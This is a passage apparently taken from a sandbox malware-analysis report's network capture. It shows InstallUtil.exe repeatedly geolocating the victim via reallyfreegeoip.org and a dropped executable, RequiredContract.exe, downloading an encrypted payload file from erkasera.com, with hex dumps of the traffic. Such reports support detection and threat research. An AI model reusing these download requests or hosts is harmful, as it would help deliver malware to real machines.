                                              server-timing: cfL4;desc="?proto=TCP&rtt=17581&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=165315&cwnd=32&unsent_bytes=0&cid=0ad0ce6f79b17061&ts=164&x=0"
                                              2024-10-28 18:04:20 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449737188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:22 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-10-28 18:04:22 UTC885INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:22 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55323
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrBCTZZmNkHS3CVYE8qrNP70FjOqgOvatUprgxlI%2FaL9xtUu4QHwxvXE52zpT%2FMPy0K5JfNV%2BzdUh6jdAJcq05J1CWnOSvrsXg%2Bcsbo2vLWQtplM%2BKTaQ80L5Ycd2IFEpBhfPavj"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd9104d78bd00-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=20473&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=142744&cwnd=32&unsent_bytes=0&cid=98cb9ad6b937f326&ts=184&x=0"
                                              2024-10-28 18:04:22 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449740188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:24 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:24 UTC882INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:24 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVhc-iOyPHcEJSw=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 61295
                                              Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Wbn5lC%2Fx9oQXik9HnFoSyNj5bFqb68SGXTQqhS0A9OLI2iU8idtCoDq5zZvGEAzdq%2FB8H9yb5cBATo7UMxb%2BkSVwAjl8dew5kzmgIGxHBkwU25g3qkDKY6W5MnVOljnOV5nQMQF"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd91af8d2e78a-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2105&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1321167&cwnd=251&unsent_bytes=0&cid=164712fe6a82a906&ts=173&x=0"
                                              2024-10-28 18:04:24 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449745188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:25 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-10-28 18:04:25 UTC880INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:25 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVhc-iOyPHcEJSw=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 61296
                                              Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6I1nA%2Bd5pfAsIAudxe3vixDrJwK%2BaoQbXXbyRkEnTf2S6H9isLrKfkxFzMHF0Br1SeGxRpDyx2G6YElN8KvgxO7yluYTS6wyTGiZS2lclls52zzoTeYg79qbXKToiJltGkUhDb0y"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd9258c24e9b5-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1952798&cwnd=251&unsent_bytes=0&cid=abcfb7026e58618b&ts=176&x=0"
                                              2024-10-28 18:04:25 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                              Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449746188.132.193.464437844C:\Users\user\AppData\Roaming\RequiredContract.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:27 UTC82OUTGET /ruurew/Ktanfonto.vdf HTTP/1.1
                                              Host: erkasera.com
                                              Connection: Keep-Alive
                                              2024-10-28 18:04:27 UTC207INHTTP/1.1 200 OK
                                              Connection: close
                                              content-type: application/octet-stream
                                              last-modified: Mon, 28 Oct 2024 08:35:54 GMT
                                              accept-ranges: bytes
                                              content-length: 951816
                                              date: Mon, 28 Oct 2024 18:04:08 GMT
                                              2024-10-28 18:04:27 UTC1161INData Raw: b5 30 53 71 d9 b0 bb e6 c7 4f 73 de a1 77 c2 18 46 1d 6f 68 a7 c7 29 fd 10 02 98 2c 17 85 15 8b 81 3e 15 09 00 75 9b 2a 19 c5 15 44 cd 97 d8 ff 5f d3 7a 5a 8b 3a a2 07 a4 29 f8 58 62 bd e7 7c 04 36 99 9a 2d f1 ce 35 2d a6 01 13 1f 59 dd 49 7c a8 cc c8 e8 51 80 85 68 2f de 35 f5 a4 f0 fa bb c1 6b f4 53 5a b1 19 cb a2 be 15 db 2c db 4d 24 ce fc 77 79 48 1d 83 07 95 d4 8b da 84 af cc 64 d1 58 81 2b f5 9f ff 71 29 d0 79 e3 d1 c2 89 0e ed 00 3a 4b a9 36 5e 64 96 b1 50 6d 69 c0 11 6e 9d b4 9e ad f6 3e 5b 9f 95 6c 5a da 79 49 3e df 83 0c a2 df 36 c0 cb 85 2e df cc 50 ba 0f 0d 19 08 11 e9 70 fc 97 a9 f0 b2 35 db 8a 3f e3 73 17 ce a7 e0 f4 67 14 1e a1 72 44 0b 3b 22 21 15 01 ac 2e 47 48 06 4c 8b ed 89 32 a4 ee a5 03 50 1f e6 b3 e2 79 d0 19 16 7b 5b 4b 4e d4 76 d2
                                              Data Ascii: 0SqOswFoh),>u*D_zZ:)Xb|6-5-YI|Qh/5kSZ,M$wyHdX+q)y:K6^dPmin>[lZyI>6.Pp5?sgrD;"!.GHL2Py{[KNv
                                              2024-10-28 18:04:27 UTC14994INData Raw: be e3 ec a7 b9 f8 32 5a be cc 3c fb e7 d4 7a 70 1a 64 8a 6f 3a eb 96 16 e5 7d d8 80 42 c6 60 0d 4e 81 14 73 0e af c5 3c f0 d3 fd 30 cb fc e0 cd 79 8a 50 49 30 d1 db d9 14 a7 90 50 ed e6 f8 9e 65 24 db 62 7d 08 c6 78 61 2d 13 e7 6d 35 59 db bb ad 0a 82 76 b3 88 22 00 7d 06 0e ab 33 d3 56 65 eb 76 8f 1e 37 e1 f1 58 d1 5a 57 0d a4 22 dc bb 93 3b d7 60 c0 8f 5b 72 84 f0 8d 32 2e c8 9b ac 7b 9b 1a 52 14 9a ad 81 7b 96 fc 2b be ad 0f c1 45 79 a7 70 dc e8 26 25 de 8a a6 e4 81 2b 65 b1 d5 5b 24 58 b7 ec 3e 35 d7 6d 71 7b 53 28 0c 9c 61 29 6f a0 2d e4 97 d2 6a 27 82 1d cb 72 8f 47 32 06 f4 63 1e f0 14 86 98 b9 4f da f9 b4 79 a7 a3 72 c5 24 c7 5c 43 38 6f e1 08 82 ae db 71 00 f6 57 cd dc 84 d0 81 1c 3b 69 b1 b3 d4 3f 69 9c 72 9f 6c 09 5e 16 42 7f 9f 03 7f 87 09 c0
                                              Data Ascii: 2Z<zpdo:}B`Ns<0yPI0Pe$b}xa-m5Yv"}3Vev7XZW";`[r2.{R{+Eyp&%+e[$X>5mq{S(a)o-j'rG2cOyr$\C8oqW;i?irl^B
                                              2024-10-28 18:04:28 UTC16384INData Raw: a4 58 c8 f1 a8 fc c0 5b 9d 3c b7 ad 06 4d 46 9d 6a 4e ca ff 5c b1 8c dc 36 91 62 87 0d 71 ed 4c c0 af 30 1d 2f e0 b4 75 40 da 3a 88 2e 87 1d 3f 18 c3 90 1e 45 5f 17 6d 49 9f d4 56 7e 53 bd 65 3b a3 8b 92 63 78 e1 56 62 3e 87 c1 ed 2c 75 a1 16 b1 cc 48 9e dd 7b be b1 5c 19 b9 dd ae 54 9b 06 dd ba be ef 7a e7 e2 d5 4e 56 f7 8f 8d c1 9e 95 b9 8b 0b 41 78 21 5f 36 87 cd de 41 6f 43 e1 d4 b2 ea 44 6c df 85 50 76 24 da 51 e9 d7 1b 8a 94 4b 66 04 7f 6f bd 6c 13 cd b9 11 ec 28 b2 ed 9f 54 a9 07 7b bf 5d 73 3e a1 3f 97 76 50 fa 93 5c 5c 94 47 ba 7d 86 fb ea 36 24 c6 81 5e 36 f3 0c 48 0d 4c d6 62 05 d6 b3 d3 2b ab 05 cd ba ae e0 11 c3 3b 57 36 c5 7c cc 70 0c 06 cd 30 af 74 92 31 6c e1 9a e8 5b f3 98 00 3b c1 2d 66 47 45 3a 0b 89 d5 7b 3a df b0 7a ad 1f 30 12 a0 5f
                                              Data Ascii: X[<MFjN\6bqL0/u@:.?E_mIV~Se;cxVb>,uH{\TzNVAx!_6AoCDlPv$QKfol(T{]s>?vP\\G}6$^6HLb+;W6|p0t1l[;-fGE:{:z0_
                                              2024-10-28 18:04:28 UTC16384INData Raw: 4d 3a a3 6f 8e e5 2a 7f 65 47 79 82 88 a2 34 4e da 9f 60 31 0f a0 2b 09 b3 25 33 ff ab 46 84 d0 4f 2d b2 bf db 1f cb c7 34 ef 6e 97 b6 a9 d2 4f f7 66 60 cc ee bd 9a d3 07 b8 ea 28 91 11 05 90 0e e6 7e 7f 5c d5 0d 3f 5d f2 ce d3 33 4e f4 14 84 0b e1 7a d7 ac 23 f4 d2 c8 5d f2 a8 8c e4 96 98 9d 67 32 62 4a 6c ee 1d ad 35 47 69 4a 8b 3f 22 d0 5c b2 b4 9b 62 4a 91 0c dc 63 76 a3 5f 60 e0 3a 8f 03 c6 81 f7 f6 75 a6 50 38 85 a3 b3 5b 60 93 0b 7d ad 79 4d 6d 8d 00 e9 7c 38 38 83 91 03 ea b7 76 c0 32 3f 99 c3 b6 b6 66 be 32 28 50 c6 9c db fa 0d e1 5b fe 80 66 b7 0f 4f 54 9d bc fb 3c b5 c8 d6 26 5f 31 3b cf 24 da f2 c5 67 28 1e 9b c6 78 1c 69 ea 08 21 ae ad c9 a4 88 d3 60 77 82 1e c4 6d 4d b4 8a f1 c4 46 7d 5f f0 5e cc 3c 1c c4 c0 61 99 85 c1 a9 16 3b 02 d2 a2 9c
                                              Data Ascii: M:o*eGy4N`1+%3FO-4nOf`(~\?]3Nz#]g2bJl5GiJ?"\bJcv_`:uP8[`}yMm|88v2?f2(P[fOT<&_1;$g(xi!`wmMF}_^<a;
                                              2024-10-28 18:04:28 UTC16384INData Raw: 34 37 4f 75 a6 43 08 37 1e 33 b5 aa f5 c8 09 53 39 55 c5 a8 89 7b ab 10 92 03 34 e1 4f d1 0b 7d 74 cc 5f 2e 1b 2d ef af c1 e1 98 76 5f 9c b9 0a 73 ad 29 e3 71 12 8d 96 5a 04 07 40 94 10 31 f9 5d f3 e2 25 ab 7f f1 74 84 93 0b da e5 d1 1c 70 7a 6c 01 2f 82 28 30 2b 4b ae ee 31 60 01 8e 5a e1 bc d8 53 0f ab 42 47 fb a8 e1 2a df fd b8 9b 34 f8 f6 2b 0e a9 4d 2b 5f bd be bd a4 30 c1 fb 11 06 41 fc 0c 74 b8 aa d3 d9 0e 3e 67 f1 77 d5 db 60 fa 71 f2 19 2e d1 cb 41 58 3f 89 54 eb 8e 42 de 25 9b ab 78 0b 9e 2c db 62 8c 7f 16 bb cf 45 19 d1 e1 f0 dc ad 62 ab 5f db ce 71 22 da 61 73 16 d0 a8 aa bf b3 bc d3 28 03 89 21 72 4c 81 a4 04 90 34 9c af 05 e0 2e f6 46 21 ea d7 24 4a 20 90 5a f8 e9 9a bd d9 ff f4 5c 55 df 74 7e f1 3c 89 22 58 43 a7 a0 dd e3 fd df 15 4e 68 2e
                                              Data Ascii: 47OuC73S9U{4O}t_.-v_s)qZ@1]%tpzl/(0+K1`ZSBG*4+M+_0At>gw`q.AX?TB%x,bEb_q"as(!rL4.F!$J Z\Ut~<"XCNh.
                                              2024-10-28 18:04:28 UTC16384INData Raw: b3 99 9c 12 e2 55 9e 5c a2 c3 f2 4e c0 9f f3 ad 34 54 ec cc f5 a7 61 bf 41 ed 84 ce 3d 00 84 2b b8 9b c7 be 66 ae 8c c7 23 5e ea 54 9b e0 2e a5 20 e5 fe e4 70 95 e7 a2 38 08 f8 61 bd 7e 09 56 25 4e 69 3b 01 ee 6b 59 78 70 15 0a 92 95 45 a7 99 23 51 4b c8 c7 23 0e 33 b6 21 ba 70 ec 79 fe e0 47 38 52 0a d0 75 e2 08 69 9e 63 98 38 ca 79 b7 11 e7 44 f7 7e 3a b4 76 25 88 a9 e4 be 62 68 d1 85 12 78 ee a3 93 c3 f9 12 71 80 f1 3f 68 63 3e 62 42 42 b8 e2 19 7c f9 42 90 cc 73 04 e5 88 89 a4 22 61 4f c4 08 74 23 30 75 42 61 17 db de ec 9f d5 42 0d 76 a7 b1 1f c7 1c e5 94 93 54 f6 24 ed 46 b8 32 d6 49 ed da d4 8a 28 98 f9 72 ff d8 d9 64 ab 4c 5b 55 b7 9d 74 db 43 19 b5 11 d8 1c 5b ca 23 32 0a bb 49 5c 25 40 37 cf 37 ee c2 16 df e0 fe ab 4e 04 61 2e b6 3c bc c6 17 db
                                              Data Ascii: U\N4TaA=+f#^T. p8a~V%Ni;kYxpE#QK#3!pyG8Ruic8yD~:v%bhxq?hc>bBB|Bs"aOt#0uBaBvT$F2I(rdL[UtC[#2I\%@77Na.<
                                              2024-10-28 18:04:28 UTC16384INData Raw: 2c 03 61 71 f9 7d 79 1b b7 a7 29 5f c2 28 26 1e 6b d7 c1 1c a5 9e 95 88 7e 2a 21 5a ce fb ad 29 4d b5 ec dd 33 97 ce b7 28 88 b1 aa 4e 30 b8 89 2c 2f 96 b5 67 63 98 b6 7b 7d c9 4a e5 01 bc c1 1e 24 f1 2a 1c fe e8 e1 82 5f d3 f5 4e 3e a8 97 9f dd f7 54 02 cf ab dd 62 59 e0 43 eb 63 e7 95 d0 b4 c4 71 d5 08 d5 b4 80 42 a8 34 11 d9 3e dd d9 e5 9f 79 46 31 b6 28 cd b2 97 95 5c 1c 16 80 3f f6 fe 86 e1 56 25 d0 b2 df 40 be 12 af 21 71 ea fa 69 17 94 db c1 2e 97 cd 3d 3b 66 15 e0 9c ed ef da f4 eb 16 f4 9b 86 1c b8 43 77 59 95 9b 1c c2 2e 77 9b b5 e5 b4 f5 a8 d5 bc e1 eb 56 76 27 7f a4 d9 51 bc 3a 83 cf 74 ea ae 70 dc 4e 00 24 87 87 c9 9c b8 57 d8 f7 1b 6f 83 ab 65 a2 69 d9 ee 68 9c 21 9f b5 d1 fc e5 04 cf 4b 1d 85 7a 3b 74 1e bf 0f 47 6f e9 dc 86 0a a7 75 e3 dd
                                              Data Ascii: ,aq}y)_(&k~*!Z)M3(N0,/gc{}J$*_N>TbYCcqB4>yF1(\?V%@!qi.=;fCwY.wVv'Q:tpN$Woeih!Kz;tGou
                                              2024-10-28 18:04:28 UTC16384INData Raw: 9e f7 8b 10 41 1e 06 e2 09 dc eb 87 57 48 73 f6 96 c6 1a 6a f7 7e 5f 13 2c 66 de 96 a1 5b a8 54 5b 3d 5a 47 08 4b 5f af 0d 33 6a a3 1a 8e e5 dd ee ee 4c 12 79 4a 92 a8 52 e5 72 37 54 89 6d 34 1c 16 76 ce 29 dd 44 4b 40 1c 9d 23 18 f1 78 a4 b4 38 9f b3 ed 8c a9 59 9d f5 08 56 fd ac be 9f 1c aa 8a fe 2b f9 c2 7b 70 73 9e 20 3b 23 d9 f5 0b 99 b1 0a 78 46 af 54 4e 28 16 76 69 38 26 4e 04 56 46 e1 cf 29 6f 84 61 25 dc ff 1c 6b 29 c3 90 64 05 a1 06 5f 6f 1b 06 4c a4 f2 ab b6 9e 4c b5 59 6b 9c 79 57 13 26 0e 83 79 aa 1a 16 6d 7a 85 1d b3 0b 98 66 03 d9 18 ac c5 1b 73 01 7d 90 e9 d9 9d 97 f1 a6 58 57 c5 ef 9d 93 45 e2 b0 77 09 4a 0d 21 a8 b4 e9 7e 33 b5 6d 73 ba 6c 8b 26 b2 11 2e e6 ac 3f 0b d7 d7 60 33 05 d7 5f 5b 14 61 16 81 02 c3 f5 77 c4 c4 1a 03 5e 22 a6 29
                                              Data Ascii: AWHsj~_,f[T[=ZGK_3jLyJRr7Tm4v)DK@#x8YV+{ps ;#xFTN(vi8&NVF)oa%k)d_oLLYkyW&ymzfs}XWEwJ!~3msl&.?`3_[aw^")
                                              2024-10-28 18:04:28 UTC16384INData Raw: b4 d2 c6 06 dc 9e 98 14 4e 7b 2c a0 ee 0f 35 14 f0 cd bd fa 00 6f 7e f3 ce cd 33 f3 07 60 36 ad 8a f2 4b aa 02 01 eb 72 1a 98 c4 44 70 12 bf 82 4a 64 2b d0 31 6f 45 10 b8 4f 82 8d 76 0d 1d 25 47 45 4c 59 a9 42 16 f3 e8 e8 f4 2e 8b de 89 9d 13 27 a4 1e cb 0f 2b c9 c2 4c 04 9f 11 bc 9b ff 49 87 e5 91 21 bc 6c 26 9f fb 34 c0 d2 9f a4 fe bc 9e e5 e6 ed d4 15 12 dc 31 33 6c 3c 2e aa 24 a1 f0 9a 17 47 80 b1 92 1d 6f 64 97 1b 01 bd 0f 39 2a 71 a4 7e 3e b0 b3 15 1d 28 21 a9 3e 8e e1 d5 fc 35 7a 5d ee 40 d0 5d f5 48 d1 0c 81 1e 89 1d 95 ff 68 e8 32 f6 4d 8d c3 5a 88 dc e8 da cc 46 86 6b dc 8f d8 37 f3 96 d1 80 8a e8 e8 ec e7 67 07 b3 fb b8 64 bb c4 23 aa a8 87 bd 59 b5 aa c9 18 28 ea 11 d7 7d f6 7c 4c 1f ec 8f 7b 19 00 61 a4 4d 7a f0 bd 9b 50 20 75 32 06 63 22 d1
                                              Data Ascii: N{,5o~3`6KrDpJd+1oEOv%GELYB.'+LI!l&413l<.$God9*q~>(!>5z]@]Hh2MZFk7gd#Y(}|L{aMzP u2c"
                                              2024-10-28 18:04:28 UTC16384INData Raw: 68 98 88 bc 56 7a 98 5e f1 bc 5e 61 5b 4d 89 4e b1 5f ec 15 06 bf ac 40 cd b4 9e 7a 2f b2 34 97 a8 21 22 c5 df f4 b3 bf 68 5b da 26 aa bb 33 65 12 c9 e3 d2 ce 66 e7 83 94 2d 50 5b eb 9d 31 30 ce 12 b3 bf 4d e5 cf e8 0c 04 94 48 1c ba d0 31 71 af c1 04 5b e3 7d e6 68 22 ce 41 2e 58 ce 6a e5 ab 78 3c b3 47 93 82 44 3b ad 02 9f 1e ba 11 6e a6 19 8e c8 41 10 23 1e 5a 87 73 55 ea d9 b6 72 9b 59 07 28 2c 2d fd dd d9 7a 29 c3 4c 40 f8 40 a1 0d e7 38 ed d3 bc be c8 26 a0 f8 85 45 d5 3b 64 c4 1f 6a 4b 9c fb d9 17 a3 e6 b4 c9 73 d7 99 30 6c cb d1 78 a3 58 f3 ba c5 6f 8c 9c 38 c0 1a 52 61 d4 56 1e cb 23 4d 48 41 9d e8 4f 60 eb 0d bd a6 dc b1 1a 70 47 bd a7 38 b9 8d 9c ac 19 96 08 39 2c 4d 44 fb ad 0c 66 e1 5f 99 43 3b d8 ec 0d d1 07 18 8e d6 72 69 36 72 55 13 59 05
                                              Data Ascii: hVz^^a[MN_@z/4!"h[&3ef-P[10MH1q[}h"A.Xjx<GD;nA#ZsUrY(,-z)L@@8&E;djKs0lxXo8RaV#MHAO`pG89,MDf_C;ri6rUY


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449748188.114.97.34437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-28 18:04:27 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-10-28 18:04:27 UTC887INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:27 GMT
                                              Content-Type: text/xml
                                              Content-Length: 358
                                              Connection: close
                                              apigw-requestid: AVwB0hEZPHcEJng=
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 55328
                                              Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xfvCMS3A2L6inN1tEMrL%2BI%2BmhOyZunhnFn5VEufpRFPGgq3QhYYbTWEsahl5Fm2n395X9PwkqJGp3J2FGZFjUCliWuyQteq6G8%2F3OdyvhJGNu7VB6kDik6F%2BfCJ2mLzKd%2Fb5%2FJDz"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8d9cd9303a8d676f-ATL
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=19878&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=145534&cwnd=32&unsent_bytes=0&cid=104b88ca2bbf50e3&ts=178&x=0"
                                              2024-10-28 18:04:27 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 